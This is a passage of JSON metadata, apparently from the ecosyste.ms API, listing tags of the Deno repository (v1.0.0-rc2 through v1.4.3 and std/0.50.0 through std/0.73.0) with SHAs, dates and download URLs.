/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"pur